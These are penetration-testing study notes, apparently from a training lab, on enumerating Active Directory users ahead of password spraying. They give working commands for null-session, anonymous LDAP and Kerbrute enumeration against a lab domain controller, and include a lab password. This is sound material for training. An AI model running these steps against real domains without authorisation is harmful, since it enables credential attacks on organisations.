Password Spraying - Making a Target User List ACTIVE Directory

By leveraging an SMB NULL session
- retrieve a complete list of domain users from the domain controller
Utilizing an LDAP anonymous bind to query LDAP anonymously
- pull down the domain user list
Use tool such as
- Kerbrute to validate users utilizing a word list
  - from a source such as the
    linkedin2username
    statistically-likely-usernames
  - LLMNR Poisoning

Using enum4linux

SMB NULL Session to Pull User List

enum4linux -U 172.16.5.5  | grep "user:" | cut -f2 -d"[" | cut -f1 -d"]"

administrator
guest
krbtgt

Using rpcclient

SMB NULL Session to Pull User List

 rpcclient -U "" -N 172.16.5.5

enumdomusers

rpcclient -U "" -N 172.16.5.5
rpcclient $> enumdomusers user:[administrator] rid:[0x1f4] user:[guest] rid:[0x1f5]

Using CrackMapExec --users Flag

SMB NULL Session to Pull User List

crackmapexec smb 172.16.5.5 --users

SMB         172.16.5.5      445    ACADEMY-EA-DC01  [*] Windows 10.0 Build 17763 x64 (name:ACADEMY-EA-DC01) (domain:INLANEFREIGHT.LOCAL) (signing:True) (SMBv1:False)
SMB         172.16.5.5      445    ACADEMY-EA-DC01  [+] Enumerated domain user(s)
SMB         172.16.5.5      445    ACADEMY-EA-DC01  INLANEFREIGHT.LOCAL\administrator                  badpwdcount: 0 baddpwdtime: 2022-01-10 13:23:09.463228
SMB         172.16.5.5      445    ACADEMY-EA-DC01  INLANEFREIGHT.LOCAL\guest                          badpwdcount: 0 baddpwdtime: 1600-12-31 19:03:58
SMB         172.16.5.5      445    ACADEMY-EA-DC01  INLANEFREIGHT.LOCAL\lab_adm

Gathering Users with LDAP Anonymous

Some examples include windapsearch and ldapsearch.

Using ldapsearch

ldapsearch -h 172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&(objectclass=user))"  | grep sAMAccountName: | cut -f2 -d" "

Using windapsearch

windapsearch

Enumerating Users with Kerbrute

look into statistically-likely-usernames for username list
- linkedin2username
- jsmith.txt is from this list

kerbrute userenum -d INLANEFREIGHT.LOCAL --dc 172.16.5.5 jsmith.txt

Using Kerbrute for username enumeration will generate event ID 4768: A Kerberos authentication ticket (TGT) was requested
- will be triggered if Kerberos event logging is enabled via Group Policy

Credentialed Enumeration to Build our User List

With valid credentials,
- can use any of the tools stated previously to build a user list. A quick and easy way is using CrackMapExec.

Using CrackMapExec with Valid Credentials

sudo crackmapexec smb 172.16.5.5 -u htb-student -p Academy_student_AD! --users

PreviousInveighZero NextKerbrute

Last updated 1 year ago

hashtagUsing enum4linux

hashtagSMB NULL Session to Pull User List

hashtagUsing rpcclient

hashtagSMB NULL Session to Pull User List

hashtagUsing CrackMapExec --users Flag

hashtagSMB NULL Session to Pull User List

hashtagGathering Users with LDAP Anonymous

hashtagUsing ldapsearch

hashtagUsing windapsearch

hashtagEnumerating Users with Kerbrute

hashtagCredentialed Enumeration to Build our User List

Using enum4linux

SMB NULL Session to Pull User List

Using rpcclient

SMB NULL Session to Pull User List

Using CrackMapExec --users Flag

SMB NULL Session to Pull User List

Gathering Users with LDAP Anonymous

Using ldapsearch

Using windapsearch

Enumerating Users with Kerbrute

Credentialed Enumeration to Build our User List